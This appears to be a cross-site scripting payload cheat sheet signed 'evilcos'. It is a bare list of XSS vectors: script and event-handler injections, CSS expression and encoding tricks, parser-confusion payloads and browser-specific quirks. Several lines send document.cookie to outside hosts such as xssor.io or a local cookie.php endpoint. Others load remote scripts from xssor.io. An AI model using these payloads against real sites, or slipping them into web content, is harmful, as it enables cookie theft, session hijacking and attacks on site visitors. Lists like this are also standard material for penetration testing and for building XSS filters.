>"'
'';!--"<XSS>=&{()}
'';!--"<script>alert(0);</script>=&{()}
'';!--"<script>alert(0);</script>=&{(alert(1))}
`><script>alert(0)</script>
<script>a=eval;b=alert;a(b(/i/.source));</script>
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
<script src=http://xssor.io/xss.js></SCRIPT>
<script>location.href='http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script>
'"><img onerror=alert(0) src=><"'
<img src=http://127.0.0.1/myspace.asp>
<img src=jav ascr	ipt:al ert(0)>
<img src=jav ascr	ipt:i="x=document.createElement('script');x.src='http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
<img src=jav ascr	ipt:i="x=docu ment.createElement('\u0053\u0043\u0052\u0049\u0050\u0054');x.src='http://xssor.io/xn.js';x.defer=true;doc ument.getElementsByTagName('head')[0].appendChild(x)";execScri pt(i)>
new Image().src="http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie);
<iframe src=http://www.baidu.com/></iframe>
<body background=javascript:alert(/xss/)></body>
body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))}
<style>body{width:expression(parent.document.write(unescape('%3Cscript%20src%3Dhttp%3A//xssor.io/phishing/%3E%3C/script%3E')));}</style>
a{xxx:expression(if(!window.x){alert('xss');window.x=1;})}
a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29}
body{background:url("javascript:alert('xss')")}
body{background:url(JavAs cr
ipt:alert(0))}
<style>@im\port'\ja\vasc\ript:alert("xss")';</style>
@i\6d\70o\72\74'javascr\ipt:alert(document.cookie)';
<div style=xss:expres\sion(if(!window.x){alert('xss');window.x=1;})></div>
alert(String(/xss/).substr(1,3))
alert(/xss/.source)
<a onclick="i=createElement('iframe');i.src='javascript:alert(/xss/)';x=parentNode;x.appendChild(i);" href="#">Test</a>
x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
<a href="javascript:alert(1)">Test</a>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4=">Test</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<div style="-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,48,46,106,115));document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);window.r=1;'):1);"id="inject">
javascript:document.scripts[0].src='http://127.0.0.1/yy.js';void(0);
<a href="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20'http://xssor.io/Project/poc/docshell.html';}}}catch(e){}},3000);void(1);">Test</a>
<script/onreadystatechange=alert(1)>
<script/src=data:text/javascript,alert(4)></script>
javascript:document.cookie=window.prompt("edit cookie:",document.cookie);void(0);
<input id=11 name=s value=`aa`onclick=alert(/xss/)>
<input value:aa/onclick=alert(/xss/)>
<li style=list-style:url() onerror=alert(1)>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,alert(1)//#">XXX</a></body>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
[!] ie only:
<div style=width:1px;filter:glow onfilterchange=alert(1)>x
<title onpropertychange=alert(1)></title><title title=>
<!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(1)//]> -->
[!] parsing error:
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1))//">
<![><img src="]><img src=x onerror=alert(1)//">
<style><img src="</style><img src=x onerror=alert(1)//">
<b <script>alert(1)</script>0
<x '="foo"><x foo='><img src=x onerror=alert(1)//'>
[!] special tags parsing issues, from: http://html5sec.org/#html
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(1)</script>">
[!] fuzzing tips:
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<a href=javascript:alert(1)>XXX</a>
[!] utf-7 bom
+/v8
+/v9
+/v+
+/v/
[!] html5sec.org
<svg/onload=alert(1)>
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<video><source onerror="alert(1)">
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>
<frameset onload=alert(1)>
<!--<img src="--><img src=x onerror=alert(1)//">
<style><img src="</style><img src=x onerror=alert(1)//">
<title><img src="</title><img src=x onerror=alert(1)//"> // by evilcos
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<frameset onpageshow="alert(1)">
<body onpageshow="alert(1)">
<script>`</div><div>`-alert(123)</script>
<script>`</div><div>`+alert(123)</script>
<script>`</div><div>`/alert(123)</script>
<script>`</div><div>`%alert(123)</script>
<script>`</div><div>`==alert(123)</script>
<script>`</div><div>`/=alert(123)</script> # Only Edge
<script>`</div><div>`*=alert(123)</script> # Only Edge
<img/src=="x onerror=alert(1)//">
<div/style=="x onclick=alert(1)//">XSS'OR
<div style=behavior:url(" onclick=alert(1)//">XSS'OR
<div style=x:x(" onclick=alert(1)//">XSS'OR
<div> <a href=/**/alert(1)>XSS</a><base href="javascript:\ </div><div id="x"></div>
<div><base href="javascript:/"><a href=/**/alert(1)>XSS</a></div>
<div><base href="javascript:\"><a href=/**/alert(1)>XSS</a></div>
<div><base/href=javascript:/><a href=/*'"+-/%~.,()^&$#@!*/alert(1)>XSS</a></div>
<noembed><img src="</noembed><iframe onload=alert(1)>" /></noembed>
[!] More will be added......
[!] By evilcos
